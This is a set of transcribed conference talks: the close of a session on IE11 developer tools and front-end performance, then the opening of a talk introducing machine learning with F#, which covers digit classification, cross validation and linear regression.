and say, I can paint now, you should create the tree now and then we can paint it. And the other thing which we did there, because that's not going to be, you're not going to get an animation nice and smooth, what we do is every, that request animation will fire, say, every 16 milliseconds or whatever the refresh rate in the monitor is. And as it fires, it's going to be in lots of different positions and we transition the object using CSS3 transitions. And the other benefit of doing that is that we offload all that animation rather than doing it in JavaScript, we're putting it into a, we're putting it into the GPUs work. So if we look at the trace of the first element and then the second element, the first element we're doing work, we're doing two lots of work, but only if one of them in that is getting painted. So all of that, the blocks of two, only one of those elements in that block of two is actually getting painted. So I think it's, I can't see that, never mind. So what you want to try and do is correlate or coalesce your style and layout changes so that they happen at the same time. The other benefit of this, if we're using, and this is a general rule as well, animation with CSS animations is far better than animations with JavaScript because we can take the animation, we can put it on the GPU and let that do it and leave our CPU to run our website. So if we look at the first trace on, this isn't using the DevTools, it's using that Windows performance analyzer. And it shows the CPU usage, the GPU utilization. And you'll notice that in the JavaScript animation, we're using the UI thread and the HTML render thread. But when we're using the animation just in CSS, we're only using stuff which is related to the GPU and scheduling for the GPU. We're not doing or blocking the HTML thread at all. So it's really useful when you're doing this work, using request animation frame rather than sort of set time out or timers or scroll wheels and making sure that you have CSS animations which transition things over as well. Another one quickly is when you're building websites and you're using images, it's very easy to just use PNGs. I use fireworks for all of my graphics and I export as PNG just out of a matter of fact. I never really thought about it much before. But there's actually a memory penalty to using PNG over JPEGs. And obviously if you're using alpha transparencies, then you have to use PNGs. But in the most cases, for just a standard image, you should be using JPEGs. And again, that build website, we took the one website which had PNGs and one which had JPEGs, exactly the same dimensions these images, but they were just different image formats. And we used the memory tool. And the memory tool in the F12 tools allows you to take a snapshot of the memory stack of the memory heap and we can say how many objects, how many JavaScript objects are in that thing at that time. And then we can take a second snapshot and we can see how many objects are in it at that time. And we can see the delta if there's more objects being added or less objects that have been added. And we can keep taking snapshots after snapshots and then comparing them with different things. So we can have a look and see how memory usage has changed over time. So this tool is very useful for seeing memory leaks, for example. If something is constantly creating objects in memory, we will spot it using this memory tool by profiling. But here I'm using it just purely to say, okay, we took a snapshot using PNGs and we've got 8.6 megabytes of memory, decoded memory. And then if we just use JPEGs, exactly the same images, it looks exactly the same. We've now got half of that, that's 3.59 megabytes. So there's a massive amount of saving in memory that you get from using something like JPEG over PNG. It's important to remember that when you're thinking about an image, it's not necessarily the image on disk which you're calculating. So for example, you might have a 557kb disk image, but the memory usage of that image to keep that in memory is actually the width of the image roughly, the width of the image times by the height of the image times by 4. So that 557kb image is actually 2.67 megabytes when it's decoded. So you don't need many of those to start getting to quite a lot of images inside of memory. And people don't necessarily realize this, I don't think, when they're building their applications. So the way that we deal with when we're trying to display an image inside of Internet Explorer, a request goes out for that image and some of it's received, it's like a stream. And so we start decoding some of it. Then more of it's decoded and decoded. It gradually streams in and we start decoding. And then we process that code and then we copy the elements of the GPU. And then we finally paint it to screen. And so we can see over here on the CPU thread we've got various bits of work, the actual color coding from, I've just realized on there. But say the UI thread is meant to be pink in here, but it's meant to be blue. So that blue section is the UI thread and then the green section is the decoding. So it's doing some stuff on the UI thread, it's then doing some decoding work. There's the decoding work. And then we have this weird space where it's not doing anything on the CPU and it's not doing anything on the GPU and there's just blank space on both. And what's actually happening here is we're making a copy from the CPU to the GPU. So we're taking the image and we're copying the GPU. Now you might be thinking, well, on a modern laptop that's not really a problem because memory bus is really fast and you can do that really, really quickly. But on low-end mobile phones it can be like six megabytes per second. So we could theoretically get to a point where to copy that image, that 2.97 megabyte image on a low-end phone might take half a second to copy it from memory to the GPU. And you start realizing on low-powered mobile phones images and the heavy use of images can really make a browser on a mobile phone appallingly slow. And it's actually getting down to memory bus speeds, which is kind of mind-blowing really. No one ever really thinks about that when you're designing websites. But you start seeing this stuff in the Web Performance Analyzer. I won't go through any more of this to others to say in IE 11 we've added features to try and improve this slightly, try and improve performance of JPEGs, I think by about 40% ahead of what we had in IE 10, because we've actually realized that we can do a lot of the processing and decoding together on the GPU rather than in CPU. So the IE 10 model is where we do the processing separately, then we copy it to the GPU. We actually do a copy to the GPU, do the processing on the GPU for JPEG decoding. So JPEGs are genuinely, genuinely smaller in memory, but also in IE 11 specifically, we've also got 30%, 40% speed increases in terms of using JPEGs as well. So on IE specifically, there's a really good reason to use JPEGs as well. But I think the important thing when you're looking at these tools and creating websites and using these tools to kind of debug your websites, you start realizing that we're no longer just creating websites for these very high-powered machines. We're not just limited by bandwidth and network, it's a whole orchestra of all these different subsystems working together. It's very, very complicated, and we're trying to deliver these tools to give you insight and to enable you to kind of debug your websites, to get insight into how you can improve performance to your page as well. I think when you're developing websites, a lot of people think about designing first for mobile, but I think you should be thinking about performance optimization for mobile as well. Think about how much you're using in terms of memory. Just check on your website using the memory analyzer, how much memory you're using, what's your memory footprint. Because it might not sound too bad if you're using only 20 megs of memory, but lots of people have multiple tabs open on, even on mobile phones nowadays, you can have multiple tabs open in a browser. And if you're 20 meg in one tab and 20 in another, well, the browser, agile switching between those tabs is going to be switching that memory around. It's going to be saving it to disk, it's going to be bringing it back into memory, and you're going to be thrashing the hard drive. And it can be a case of actually reducing the lifespan of the hard drive or the storage on a phone just by thrashing it by moving stuff back and forth from memory and using poor memory management. So think about mobile first when you're designing websites and thinking about low-powered hardware and using these tools to try and get some insight into that. Up until very recently, that was a bit of a problem on something like Windows Phone because we didn't have any tools to give you that. You can now, if you've got Visual Studio and Windows 8.1 phone and IE 11 installed on the phone, you can use Visual Studio to debug websites on those phones as well. So you can either do this in the emulator or you can actually plug in a device and use that. But you go to the debug menu, other debug targets, and then debug Windows Phone into the Explorer. It will bring up a dialog box. And then all of the tools that I showed, kind of the memory, the DOM Explorer, all of those things will work as well on the browser on here. So it doesn't have to be your code, it could be any website, and you can sort of start interrogating your mobile phones as well. That's kind of it. It's a whistle-top-store, whistle-stop tour of the developer tools. And I hope that you kind of will look at those tools and see that we're trying to do some interesting things, not just to help you debug websites, but also improve performance. So if you are interested at all in looking at the tools in more detail, I'll be at the stand, the IE or the Windows stand, all the rest of today. And please come along with your websites and we can have a look at the performance of them. So thank you very much. Okay. If anyone's got any questions, I don't know if anyone's got any questions. We've got five minutes left. I have no idea. Let's try it. I don't know how it works on the Norwegian Coreboard Keyboard. We can try. But yeah, I hope there's a different key mapping, but I don't know. So there's a question. Browser mode. Yeah. You can change the IE version down to IE 7. IE 7. So the question is, have we brought back browser mode? Yes, you can emulate IE 7, IE 8, IE 9, IE 10, and IE 11 using the tools. Obviously some of the tools like the memory analyzer won't work when you're trying to debug in IE 7 emulation. But you can use that. So the question is, in conditional, do we support conditional comments? Yeah. I think conditional comments should now be included in the DevTools. Because we stopped conditional comments in IE 10 to comply with the HTML5 rendering specification. But yeah, I think if you change the emulation mode, it will still take in consideration conditional comments. Yeah. I'll check that. But I'm pretty sure it does. Yeah. I don't know. Do you use that what you use, your Dev Machine to run? So you want to run IE 11 on 70,000. Yeah. To get these tools working, there's a whole lot of plumbing which requires IE 11. So these DevTools will only work in IE 11. You could use, I don't know if the, try, you could install Visual Studio and see if the DevTools works through that. I don't know. Yeah. You need IE 11 to get these DevTools working. Anymore? Thank you very much.
|
Building a high performance front end is a balancing act. You need to understand all the different moving parts and subsystems in the browser and how they interact with each other. Small changes can significantly impact page and app load time, memory consumption, and processor use which has a huge impact on your user’s experience! In this session, we will dive into the subsystems of the browser and learn to optimise performance on sites and in web apps. We will also deep dive into the new performance analysing tools in IE11 available expose good and bad run-time patterns for your sites and web apps, and provide users with a fast and fluid experience.
|
10.5446/50819 (DOI)
|
Hello, everybody. So I guess it's time to start. So I'll be talking about machine learning on f-shop today. Before starting, here are a few words about me. So my name is Mathias Brandvinder. You can find me on Twitter as at Brandvinder. Usually I'm the little character on the right that's me on GitHub and places like that. That would be typically me. I'm French. I live in San Francisco. It's my first time in Oslo and I'm having a grand time like it's really awesome. A few things which might be relevant. Unlike probably most of you, I'm actually not a software engineer by training. I came to software engineering 10 years ago. My background is in economics and operations research. That's like applied math, optimization, probability, all that type of stuff. And I came into.NET 10 years ago a bit by accident. At the time I was doing models and I was doing a whole lot of VBA and more and more VBA. At some point I had to realize that this was probably not right. So I looked into other things and as I came across C-shop, I started with C-shop. That was great. I still did models forecasting things. Four years ago, I read somewhere that you were supposed to learn a new language every year. I opened Visual Studio. There was little box which was f-shop. I thought, hey, maybe let's give it a go. I started with it and I completely fell in love with the language. Since then, it's like I do f-shop pretty much all the time. I see shop when I have to. Something along these lines. Since then, I have been doing mostly forecasting quantitative models using software. I discovered recently that apparently this has a name and this is called Data Science. Apparently I'm a data scientist. I looked from the definitions. I came across a few definitions. One of them is a data scientist is a statistician who lives in San Francisco. That's correct. The other one is a data scientist who uses a Mac. So that's not correct. The third one where I thought it fits well is this one which I really like is a data scientist is a person who is better at statistics than any software engineer and better at software engineering than any statistician. I feel that's kind of what I'm doing. Data science is about having one foot in math, statistics and all of this and the other one in code. Otherwise, I have a blog and all these things. Today we're going to talk a bit about machine learning and data science. I made a few assumptions about who you guys were. The first assumption I made is everybody or most of you are probably familiar with all languages, C-sharp, Java, all of this. I'm assuming that most of you or probably all of you are unfamiliar with machine learning because it's a software conference, not a machine learning conference. I'm assuming that some of you, probably not all of you, are familiar with F-sharp and that some of you and probably not most of you are familiar with functional programming. Is that a first assumption so far? Cool. Okay. So I'm not completely off base. That's reassuring. So why did I want to do this talk? So I live in San Francisco. This is probably a bit of a bias, but right now in San Francisco, the topics machine learning and data science are red hot because I'm a data guy. I bought a piece of data on the right. This is the list of meetups, a recent list of meetups. Pretty much every meetup on the topic is drawing somewhere between 100 and 300 people and you have one of these every week. It's just people are getting crazy over there. So I do realize that San Francisco is sometimes biased. It's not necessarily what the rest of the world is doing, but I feel like there is a big trend there. The second thing I noticed is if you go to machine learning talks or talk to machine learning people, usually they talk about lots of things, but they don't talk about.NET much. So coming from.NET, I felt like that's for me, that's a bit of an issue and I think they're probably also missing something with F-sharp. The third one is on the other side of the house, and the software side is I think lots of people in the software community don't realize that machine learning is for statisticians, but it's also for software engineers. The reason is not called statistics, it's because it's like one foot in one and one foot in the other. And so I feel like it's important to actually tell you guys that it's a fun place to be and you should probably look into it because it's going to be a fun place with very fun computer science problems and so you should look into it right now. So my goal today, I'll start with what I can't do and what I can't do is two things. There is no way I can introduce F-sharp in one hour, that would just make no sense. The other thing I can't do, which is probably even worse, is like introducing machine learning in one hour, I can't do that either. So I had to choose a bit how we'd approach the topic. So what I want to do is rather than trying to do everything poorly, I'm going to try to do a few things hopefully decently. And what I want is to give you a sense for what machine learning is. Given the fact that you're developers, I'm going to try to highlight also some of the differences with how is it different from a writing code as a software engineer and give you a sense of what is the day of a machine learning guy. And the other piece is obviously I'm here because I want to talk about F-sharp and so I'm also going to have a second thread which is going to be try to explain why F-sharp is actually a great fit for that type of activity and why you should pick it up. So quick introduction in case you haven't heard about F-sharp, like in like five bullet points, I guess F-sharp is a functional first statically type language. So it's just like C-sharp is like object first, a bit functional. F-sharp is kind of the flip side of that. It's cross platform, it runs on Windows, on Mac, on Linux, I can pretty much whatever you want. It's open source. There is actually in the room T-hand over there, like there is a pull request like last week which went to the compiler, so like it is open source. One way you could think about it is maybe something like Python with types. So another mean way to say this would be like it's Python which is actually performant and with less typing mistakes. And it's also a language with a fantastic community. And if you want to find us, it's on Twitter, hashtag F-sharp. So that was for the F-sharp side, for the machine learning one. So I thought it would be useful to give a definition for this. Like it's a bit clearer than data science actually which is a bit of a buzzword. And so when I need a definition which I go to the source of truth, so I went of course to Wikipedia and I copy pasted this one and the how to put it. Like the dry version is like a computer program is safe to learn from experience E with respect to a task T and a preference measure P if it's performance at T as measure blah blah blah improves with experience. So that's, it's a definition. It's probably not the most friendly definition. So I thought an English translation might help. So what you're really trying to do is like one is like you're writing a program and your program is written to perform a task. And to perform that task, you're actually going to consume or use data. And the part about performance and all of this is really saying like you're doing a program such that the more data the program is going to see, the better the program is going to become at performing that specific task. It's probably easier that way. And it's rooted in statistics and in math, but it's also a computer science problem. For me, the reason it's, it's called machine learning probably and not statistics. It's like statistics was rooted in the past in the days where you had very little data, you had no computer, like it was the dark ages, maybe you had floppy stuff like that. And so like your problem was a very little data and squeeze information and machine learning is different in that today it's not the problem we have. Today, the problem you have is like you have probably too much data. And so the old school statistics don't quite work. And this is where you're trying to do the same thing as a statistician, which is use your data. But you also need to know a bit of computer to deal with it because it's just not a tiny file. Like it's a bigger, bigger type of thing. So the plan, I was saying like I'm going to have like two threads here. So the I'm going to progress in like four little sections. Each of them is going to have a bit of a machine learning point. So I'm going to try to teach you some ideas or some concepts about machine learning so that you come out of it and you have a bit of a sense of the landscape. So on the first section on the machine learning side will be I'll talk a bit about classification. I'll be talking a bit about regression and about unsupervised machine learning. So these are things I'm going to try to show you a bit what they are. And on the right hand side, at the same time, I'm going to show you like how you can actually do fairly decent machine learning on dot net and if shop in particular, because they are actually pretty good libraries. I'm going to talk a bit about algebra because even though it's probably not your favorite topic, it's actually an important topic and for people who care about it, it's a big deal. And I'm going to try to make the point that functional style is actually a great style of coding for machine learning. And finally, I'm going to talk about something which doesn't fit in really one or the other, which is type providers, because any sufficiently long discussion with F sharp people ends up with type providers. So that's what we'll do. So let's start with a classification and regression. And the goal here in my section will be to give you a sense of like, if you do machine learning, what does a day of machine learning look like? And I'm also going to explain what classification and regression are. So that's a bit of vocabulary or conceptual ideas. One thing you might want to do with your data is you have like two classes of problem. One class of problem is like you're trying to you have data and you're trying to make a prediction. And your prediction is trying to use the data to classify items. Like you're trying to say, is this red? Is this black? Or typically prototypical examples would be if you take your inbox or like your email system, you probably have a spam filter. That's a prototypical classification problem. I'm receiving emails and I'm trying to say, is that email spam or is that email ham? Sorry, that's a classification problem. The one we're going to look in a minute is a character recognition. I'm trying to say, is this an A? Is this a B? Is this a C? These are like discrete choices. I'm trying to say which buckets do I fall in. By contrast to that, the second big class of problems you can find is regression problems. And in a regression problem, you're not trying to decide whether something is in bucket A or in bucket B. You're trying to predict a number. The prototypical example would be I'm trying to predict the price of that car. I'm trying to predict the cost of an apartment. So a number which could be from zero to whatever, that's a regression problem. And both these things belong into one category of machine learning, which is what's called supervised learning. A bioposition to unsupervised, which we'll look at later. So the idea of supervised learning is I have data. I have a question and I know exactly the question I'm trying to answer. So in the case of my email, I know that the problem I'm trying to solve is I want to know if it's ham or it's spam. If I want to recognize characters, I want to know if it's a one or two or three. So that's a supervised learning problem because what I'm going to do is I know the question I'm trying to answer and I'm trying to help the model, push the model, or supervise the model into the direction of the question I'm interested in. Does it make sense so far? Cool. So rather than talk more about classification, what I'm going to do is I'm going to actually work live with an example. I pulled it from Kaggle, which is a company in San Francisco and they organize machine learning competitions. For that matter, if you're interested in getting started with it, check out Kaggle.com. They have free competitions. They have competitions where you can make a boatload of money and it's just extremely fun to do and to get started in the topic. So the problem of the digital recognizer is simple. They took people. They asked them to write numbers on a sheet of paper, one, zero, three, whatever. So this is the type of thing you have. And your problem is now, if I give you a new image, which you have never seen, you're trying to tell me, is this a five? Is this a three? Is this something like that? So we're trying to build a classifier which recognizes handwritten digits. To do this, we're going to use a classic algorithm. I thought I would just say what the algorithm is. It doesn't really matter, but we're going to use a support vector machine. And we're specifically going to use the Accord.net implementation. And one of the reasons I picked it is Accord.net is actually written entirely in C-sharp. It's a pretty nice library. They have lots of things. And the thing which is neat is I can use this out of the box with a F-sharp, absolutely no problem. Whatever you have in C- sharp, you can use it in F-sharp. And what the algorithm is going to try to do, if you see the picture, I'm trying to classify black and white. And the general high-level idea is the algorithm is going to try to separate the two groups. So in that case, black and white. In our case, more zero, one, two, three, four, by boundaries or by bands which are as wide as possible. That's what it's trying to do. So that you're not only do you separate the data in two groups, but you are pretty certain that the separation is good. So you're trying to make it wide. And so now I'm going to show this in action. And so I'm going to jump straight in Visual Studio. And I'm going to go to the place called the classification. It's magnificently organized. So my day as a machine learning guy will typically start with data. And so that's really the your day is probably going to look a bit like that. Show me my data. That's typically your day, which is probably not what you used to as a software engineer. It's like your prototype problem is like somebody will say, hey, here is a big chunk of data. In that case, what I have is I have, so these are the images I was talking about. I have like 5000 images. I have something like 800 columns. And so this is obviously not fun to work with. But that's the type of material you're dealing with on a daily basis. And now my problem is like I want to make a prediction out of this. So what I'm going to do is I'm going to jump into the scripting environment like F sharp interactive in F sharp. And I'm going to just load a few references here. So like think about like I'm just loading what I need. That's not usually interesting. And now my day can begin. So the first thing I'm going to need to do is I'm going to actually load that data. So let's do this. So I'm going to like this is like where the data is with the name of the file is nothing super interesting. And here I'm going to just write like a small function, which is going to read my data. We're going to see there's actually much better way to do that in a minute or in a bit later. But here I'm going to say, hey, look at the file path, read all lines. And then is like, take these lines, drop the header, like just keep everything from one to the end, then take every line and split it, then take everything which has been split. The first thing is going to be the number I'm trying to predict. The rest is going to be the pixels. And then I'm done. And the one thing I like about F sharp is like this, this thing here on the left is like the pipelining, which is like, when your day looks like data, and you try to transform data, like this is a pipeline, which is showing me I'm trying to do this, take data, transform, transform, transform, you're done. Like this is extremely readable. And I really love this. Like it's a small feature, but it's really neat. So what I'm going to do, I'm going to run it. And I'm actually going to read data from my training set. So obviously, like this is going to take a bit of time. Like it's not big data, but it's let's say, moderately, like tiny, more than tiny, but not big data. So it's like, I loaded it, like it took a bit of time to grab. And I'm just just making the observation for the moment. And just because, like, nobody, nobody is right, might like this is not exactly pleasant to look at what I'm going to do is I'm going, I wrote a tiny visualizer. So what I'm going to do is I'm going to take the 10 first elements in my set, and I'm just going to represent them. So this is like the data we're dealing with. I have a three that's fairly recognizable, a five like that's already like the point here is like, you can see that three humans have written it, some handwriting are pretty nice. And some of the some of them look more like your physician or your doctor writing the prescription. So it's like, it's not a trivial problem. Like even as a human, sometimes I look at the images, and I have no idea if it's really, okay, this one actually pretty, these are, so that's one, for instance, like I would not necessarily have guessed it. So that's, that's what we're trying to, to predict. So now I loaded it. So it was a bit, it was a bit slow. So I'm going to use simply, I'm going to use simply accord.net. And what I'm going to do is I'm going to set up the algorithm we're going to use. So, and so I'm going to choose here, like the details are not super important. But if you see the end is the end is like learner algorithm passing a configuration. So I'm going to tell the algorithm how I want to learn about my data. To do this, I'm going to specify like this is the algorithm I want. I'm going to use a kernel, which is a linear kernel that doesn't really matter what it is. Work this way, prepare the configuration. And now it's like my learning routine is like ready to go. The only thing I need to do is I need to pass it data, which is the next thing I'm going to do. So I'm going to say learner run. And it's going to, now it's working the magic like a cranking on the data and trying to learn. So let's give it a second. The algorithm at that point is looking at 5000 elements. And it's trying to separate the ones from the twos from the three and create like something which then you can pass to data and which is going to tell you I think this is the one. I think this is the two and so on and so forth. And so like this just runs. So this is wonderful. And on top of like the running part is like it also gives me an error. And now this is absolutely awesome. I can see on the scripting environment here like this is telling me, hey, like the error is like zero percent. Hooray. It's like my day is gone. It's like 100 percent correct. It's like it's time to open a beer. Let's go celebrate. We're done. Right? And I would say like not so fast because like the, I'm sorry, like it's really nice to go for a beer, but it's a bit too early. So, where's my mouse? The reason it's like a bit, it's a bit too early is what we really did here is we gave the algorithm a set of data and we told it, hey, do the best you can to give me a model which fits on this data and gives me the right answer. That's great. The problem you might get too is like you will, you will potentially get what's called overfitting, which is like you get a model which is going to be extremely good on one data set. The one thing you don't know is like, is this going to actually work on data? It has never seen. And that's really what you want, right? It's like the fact that it's doing a good model and the data you already know is kind of useless. If you're creating a model, it's because you want to predict things you have not seen before. And so in the olden days of statistics, like you would go, you would crank out the math and the blackboard and all of this and like do lots of calculation. But today, given that we have more data, there is a method which is much easier to check how good your model is doing. It's like if I have lots of data, I can just say, hey, like take half of the data for the learning part, create a model and keep the other half and just like run your model and the other half and see if it's doing any good. And that's going to be a really giving you a pretty good answer because now is like you're giving data it has never seen. That's going to behave pretty much like in real life. You can immediately see is it good, is it bad and if you need to rework things. So this is what I'm going to do here. And that's called cross validation. So here I'm going to open my second data set which is validation which is really exactly the same. Or not exactly the same but like a similar type of data set. And I'm going to now what I'm going to do is I'm going to take the learner or the classifier I just created and I'm just going to run it on my data. So what I'm going to do is simple. I'm going to take my validation data and for every element I'm going to look, this is the true answer like the label. This is the image. And now I'm going to say like a classifier tell me the answer. If this is the same, this is a one. If this is not the same, this is a miss and this is a zero. And at that point if I average this out, I'm going to get the percentage of misclassified. Everybody with me? So let's do that. And again I think like the pipeline style is pretty neat. Like you can really read fairly well what's happening. So I'm going to do that. And so you can see like to my point is like we get something which is still pretty good. Is this still pretty good or is this terrible actually? No, that's pretty good. So it's like instead of like 100% of the training set, now we get like 90% correctly classified. So it's still decent but like it's not quite as beautiful as we initially thought. And so that's an important part of the machine learning process is this idea of you do a training set, you train on it and then is like you keep the other side of the data and you do validation on it. So now because like numbers are kind of dry is like I told you like it was 90% correct but like hey like why would you believe me? So what I'm going to do is I'm going to use again my visualization piece and I'm going to do the following. I'm going to take like 10 random images in my data set and I'm just going to classify them and we'll see what it does and that will give you a sense of how good it is. So this was the three, told me it's three, that's actually pretty neat. This is impressive like because I'm not sure I would have gotten this right. See like this was a one and this told me a one. This one I'm starting to be really impressed because like this is really an ugly eight and it got it right. I might have gotten one hundred. Yeah that was easy. That was easy. That was also pretty neat actually. It could be a four. It looks like on my little sample. Wow. See that's nice. It's like recognizing a six year like. So I think it's neat like in like 10 lines of code or so. I managed to get something which recognizes like 90% of images like took me just a bit of work and it's working nicely. So that's really a lot on how you do is going to look like now is like so what we have is we have a model. It has a certain quality. We also have cross validation with training and training and validation. So we have something like a harness which tells us like are we doing good? Are we doing bad? And we can start working. So the next step would be hey can I go from 90 to 91% maybe 92% like try to squeeze out some more out of the data. And so this is where having the reason I went into the scripting environment here is it's a feature which is making a huge difference in my life in the context of machine learning because now imagine that you are in C shop and your project was in a console app or like whatever. Every time I decide to change my code what will I have to do? I will have to do two things. I will have to recompile and I will have to reload absolutely all my data. And so the recompile part is not that bad but like the loading the data, like this was a fairly tiny data set and it took me like a couple of seconds to load. If I have something more reasonable it's not unusual to spend like two or three minutes loading the data. So if I have to rebuild, reload every time I change something like my day is essentially going to be spent loading data and waiting for data to load. That's a terrible situation to be in. If I'm in the interactive environment the repel like this with F shop is like this is beautiful because now I can keep going. If I wanted to I can change my code I don't need to reload the data. It's loaded in the morning like I go load I do my coffee and then I come back it's there and then I can start hacking for the whole day. That's a big deal. So that's why that's one of the big reasons I in general is like doing machine learning without a repel is like shooting yourself in the foot and that's one of the reasons I would take F shop any day over C shop for that type of work. So this will be closing the part on the classification. Do you guys have questions? No questions for the moment. So I will move to the second step. There will be less moving images. I'm sorry like but I tried my best to make algebra sexy but it's it's resisted a bit. So I still wanted to talk about algebra because it's actually algebra is an important area like the reason I try to show why it's why it's important in a second. But if you take for instance the there is a great class online on course era which is like a machine learning machine learning class and if you take that class you will see that pretty much every session is like algebra algebra algebra and there are a few reasons for that but like if you do machine learning chances are you are going to care about having good or bad linear algebra. So here what I'm going to show is like simply even without thinking about machine learning there F shop has a few nice features which make make it very pleasant to work with algebra like if I take something like this let a equals matrix I mean if I look at this this is pretty much how my matrix would look at would look if I open a math book like it doesn't look like something complicated something weird it looks exactly like the math if I to if I create a vector same thing and I can do things like that like C equals B times a like this is a this is also very close to the way it would look to somebody coming from at lab coming from octave like if you want to walk in algebra you want to look you want it to look like algebra and like F sharp is going to give you that so if sharp is a F sharp is awesome again so that's the first point the second point is like besides besides the fact that algebra looks like algebra there is a feature which is really neat so if you come from Python you're going to say of course it has it like it's called slicing or array slicing one operation you're going to have very often is like hey I have my data set I want to drop column seven I want to to manipulate it a bit and so one thing you can do here which is pretty neat is I can say now I got my my vector and my matrix and what I can actually do is I can say out of the matrix here I want you to take only column one to two and I want you to take only column row zero to one that's extremely convenient like it's the type of thing which you won't be able to really do nicely in C sharp and which makes a huge difference in a in clear code and in a in get yeah in clear code and in knowing what you're doing because like when your code is not clear then this is when you start to doing mistakes so again like from a Python people is like yeah of course like that's not really impressive but but depends where you come from so so that's why I think like F sharp is a for me F sharp is a pretty good choice like if you want to do algebra it's going to look like algebra now one of the reason there are a few reasons why machine learning people do care about algebra the first one is I can't quite go into details of why that is but like lots of problems which are related to optimization in machine learning can be expressed in an extremely compact way like in a very short way instead of having loops everywhere you can just write a few matrix operations and your problem will be just stated and done so in that case the what I wanted to do was to show a bit regression a linear regression and so for instance like solving a linear regression which is like if I take input and what I'm trying to do is like I'm trying to predict the output as a linear combination of the input it turns out that I can solve that problem as a one-liner in algebra using the normal form and so that's the way it would look is like you take if you take the math book or the statistics book you're going to have something like x transpose times x inverse times x transpose times y so the details are not usually important but that's going to give you if you use this like the algebra is going to give you in one line exactly the solution to your regression problem so already that's nice because it's very short so let's let's do this and now what I'm going to do here is I'm going to create a completely artificial data set because I didn't have really a good one and what I'm going to do is I'm going to create a data set where imagine that I'm trying to predict the price of a car I'm going to create 500 features so I could probably not come up with that many but imagine that what I have is like the age of the car the number of cylinders like the mileage like all that stuff and I have 500 of these like it's starting to be a not big data yet but like serious data and I'm going to have like 5000 observations like these are my cars and what I'm going to do is I'm going to create so the real model is going to be a vector of 500 components I'm just making it like a random vector because I don't really care what the numbers are and I'm going to create also a random set of inputs here and now what I'm going to do is I'm going to create a model which is a perfect fit so what I'm seeing here is like why the output like the price of the car in that case is going to be take every observation in my data set which I created here and multiply true beta times x so it's like I'm really exactly producing the linear combination of my input so let's do this I really like if you don't get the details that's usually important just like trying to explain a bit what I'm doing here so here what I did was I created a data set so a nifty feature also which I really like in f-shop it's like maybe under heralded is like this small thing here is like you can type in like a hash time and I let you guess what it does is like suddenly you have a timer and this is extremely convenient when you just want to like even if you don't do machine learning like this gives you a nice way to start tuning your code and see what works where you're spending time so now if you recall like the the math book is telling me like this is how I should compute my model like this was this is really what I get like if I go to a math book and so I'm going to write it in f-shop and it's like hey sure enough like it's looking exactly the same x transpose times x inverse times x transpose times y so it's like that's nice again is like I take the math book I just copy over and it's just going to work so now I'm going to run it and like this is so now it's cranking and it did crank and so this is where like the timer is telling me hey like this thing took five seconds you have this is a stuff about the garbage collection well this doesn't really matter but so now is like it took me five seconds to estimate my model good one thing I should be able to check is like if I'm correct what I should observe if you recall is like what I did I created the output by using a vector which was true better the result of my estimation is better so normally if I make the difference between what I used and what the model estimated everything should be zero like the two vectors should be the same otherwise is like my model is not doing what I expect so I'm going to just check this out just to make sure I'm not cheating you and here what I'm getting is like it's telling me the difference here so I'm taking every element I'm computing the difference of the values and taking the biggest one and so the biggest error is zero which means I hey like the model give me exactly what I expected like it was a perfect fit in five seconds good so so the I said like the first reason people care about algebra is that it's going to give you very compact very compact solutions it's very easy to express things you should be complex to express otherwise like this is a dysfunction or this expression here is very short and so that's that's kind of convenient that's not the only reason people care the other reason people care about algebra is because so sometimes there is an upside to people who do video games and so one of the good things about video games is that these guys have been need really graphics which go blazingly fast as like it turns out that the graphics also use linear algebra and vectors and so that's pretty awesome because now because of some of you guys are playing Halo or like whatever whatever you guys are playing is the industry has put tons of efforts in the hardware to actually get that type of operation to run blazingly fast and so that's cool because now what I can do is like instead of using the initial computation I did which was reusing traditional CPU and all like all dotnet what I can do is I can ship this and send it to the CPU or to hardware and I use like the goodness which is coming from from the gamers so thanks to the gamers so and this is extremely simple in that case so what I can do is like I can say hey instead of using the normal linear algebra provider what I'm going to do is I'm going to use the mkl linear algebra provider sorry mkl linear algebra provider good so what this is is like it's saying instead of computing normally algebra computations when you see something which looks like algebra ship it to the CPU where you're going to find a bit of hardware which actually knows about algebra and I use that because that's going to be better so that's what I'm going to do here and now the cool thing is I can take exactly the same operation I had before but I'll give you a hint like if you see that it's called fast better it's probably going to go faster so I'm running exactly the same thing as before and bam so if you remember like before that we had what like five seconds and now we went like from five second computation to zero point five second so is that with the one line of code there is like I got like a speed up of like I reduced my computation time by 90% so that's that's nice it's like hello and the gamers they can give me a massive speed up and and this is probably the most trivial thing you can do like mkl is not the the craziest one so you are like really crazy people like user GP GPU and f-shop also has a great story on this like so f-shop historically is coming from OCaml which is coming from ML and ML the name ML is coming from meta languages and these languages were created like for compilers for code analysis and all of this and they are actually pretty good at doing compilers to other things so is like of course like every language today has a compiler to JavaScript so yeah f-shop has a compiler to JavaScript but there is also a compiler to a kudin to a to GPU like the it's a commercial product called alia kubase but it's just completely awesome is like if you want to target the GPU instead of typing a handcrafted c code you can just like write high level code in f-shop it's going to be generic and all of this and it's going to compile like straight to the GPU and run blazingly fast so most people if if your daily life is like writing accounting applications you probably don't care if you're doing like neural networks and deep learning like this is the type of place where people's eyes light up because that's that can mean something like a 50% faster computation on something which is which could take a couple of days so that's a big deal and I think that's what I have in regression so far do have questions from you guys what what no I don't like yeah like I should have Britain no is I wish maybe next time I do that but like I don't so let me go back to the states for a sec so the takeaways from from this section of the thing I hope I conveyed are the following is like one is like f-shop is a first-class citizen in dotnet and also the reason I'm mentioning this is like sometimes people have the impression that f-shop is a different language and all this and it's like it's actually going to work really nicely like anything which has been ever done in C-shop is going to work in f-shop and vice versa so you can actually reuse a ton of stuff to even though dotnet is not Python maybe like we don't have the same length of history and machine learning we don't have maybe something as deep as scikit there is actually a ton of good tools which already exist and which are pretty decent like accord.net has all the things you expect in the first pass like has a logistic regression has support vector machines has neural nets like all the the base box is there so it's not like you're naked in the jungle with just a knife like you have things to use you have alia cubis you have a good measure you have a good linear algebra library three the thing I really care about is the interactive experience with the rappel which is going to make your day either if you don't have one your day is going to be miserable if you have one your day is going to be possibly miserable but like one of the miseries is gone. So I know not everybody would agree on that but I would argue that actually syntax matters and that's why I showed a bit the algebra case is like if I work on a problem which is about matrices and vectors I would like my code to look like matrices and vectors and that's the type of thing you will get with f-shop because probably because it's functional closer to math like you get things which look actually much closer to the type of code you're typically writing in machine learning so it's how it's easier to understand and all of this and finally on the machine learning front I hope I give you a bit of a sense of what what is classification which is regression unsupervised learning and what cross validation is about so I'll close like the first step of my journey here and I'm going to go to the next step which is unsupervised learning and the goal is yet to 